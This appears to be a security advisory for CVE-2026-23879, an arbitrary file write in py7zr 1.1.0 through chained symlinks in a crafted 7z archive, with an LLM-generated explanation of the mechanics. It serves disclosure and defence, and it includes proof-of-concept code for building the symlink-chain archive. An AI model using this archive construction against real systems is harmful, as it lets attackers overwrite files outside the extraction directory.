VYPR
← All advisories
High severity8.0GHSA Advisory· Published Jun 19, 2026· Updated Jun 19, 2026

py7zr: Arbitrary File Write Vulnerability

CVE-2026-23879

Description

Summary

There exists an arbitrary file write vulnerability in py7zr (1.1.0, latest), which allows symbolic links to be recreated outside the destination directory via crafted malicious symbolic link chains. When using extractall to extract an archive, the library restores these symbolic links, linking them to arbitrary directories on the host file system. Subsequent extraction of regular files through these symbolic links can result in arbitrary file writes. This vulnerability may lead to remote code execution, privilege escalation, data corruption, or denial of service.

Details

The root cause of this vulnerability is that py7zr fails to properly restrict the targets of symbolic links within an archive. During extraction, the program only checks the link arcname within the destination directory, but ignores the combined symlink path resolution. Attackers can exploit this vulnerability by constructing malicious archives, thereby bypassing the directory boundary restrictions implemented by the extractor.

PoC

#### Construct PoC Archive File The following pseudo-code illustrates the vulnerable logic.

def create_sevenz_exp(output_dir: str):
    filename = "archive.7z"
    file_path = output_dir + filename
    with py7zr.SevenZipFile(file_path, 'w') as archive:
        archive.writestr("Some Text", "dir0/someFile.txt")
        add_symlink(archive, "dir1", "dir0/..")
        add_symlink(archive, "dir2", "dir1/..")
        add_symlink(archive, "dir3", "dir2/..")
        add_symlink(archive, "dir4", "dir3/..")
        add_symlink(archive, "dir5", "dir4/..")
        add_symlink(archive, "dir6", "dir5/..")
        add_symlink(archive, "dir7", "dir6/..")
        add_symlink(archive, "dir8", "dir7/..")
        add_symlink(archive, "myTmp", "dir8/tmp")
        archive.writestr("Malicious Text\n", "myTmp/poc.txt")
Unpack the archive

Use common decompression methods, then extract the archive.

import sys
import os
import py7zr

def extract_7z(seven_path, output_dir):
    os.makedirs(output_dir, exist_ok=True)
    with py7zr.SevenZipFile(seven_path, mode='r') as z:
        z.extractall(path=output_dir)
    print(f"Extracted '{seven_path}' to '{output_dir}'")

if __name__ == "__main__":
    seven_file = sys.argv[1]
    base_name = os.path.splitext(os.path.basename(seven_file))[0]
    output = base_name + "_sevenz_output"

    extract_7z(seven_file, output)

Impact

After decompression, the output directory contains a sequence of symbolic links, which can finally point to the system root directory. Then, when extracting a regular file, the file will be written to an arbitrary path.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected products

1

Patches

Vulnerability mechanics

Root cause

"py7zr fails to properly restrict the targets of symbolic links within an archive, only checking the link arcname within the destination directory while ignoring the combined symlink path resolution."

Attack vector

An attacker crafts a malicious 7z archive containing a chain of symbolic links that, when resolved, point outside the intended extraction directory (e.g., to the system root). When a victim calls `extractall` on this archive, `py7zr` recreates the symlinks, and subsequently extracting a regular file through the final symlink writes content to an arbitrary path on the host filesystem [ref_id=1][ref_id=2]. This can lead to remote code execution, privilege escalation, data corruption, or denial of service.

Affected code

The vulnerability exists in `py7zr` version 1.1.0 (latest at the time of disclosure). The `extractall` method fails to properly restrict symbolic link targets during extraction, only checking the link arcname within the destination directory while ignoring the combined symlink path resolution [ref_id=1][ref_id=2].

What the fix does

The advisory references a fix in py7zr release v1.1.3 [ref_id=1], but the patch diff is not included in this bundle. The recommended remediation is to properly validate the resolved path of symbolic links during extraction, ensuring that no symlink chain can escape the destination directory. Without the patch, the library remains vulnerable to arbitrary file writes via crafted symlink chains.

Preconditions

  • inputThe victim must extract a maliciously crafted 7z archive using py7zr's extractall method.
  • networkThe attacker must be able to deliver the crafted archive to the victim (e.g., via email, download, or file upload).

Generated on Jun 19, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

3

News mentions

0

No linked articles in our index yet.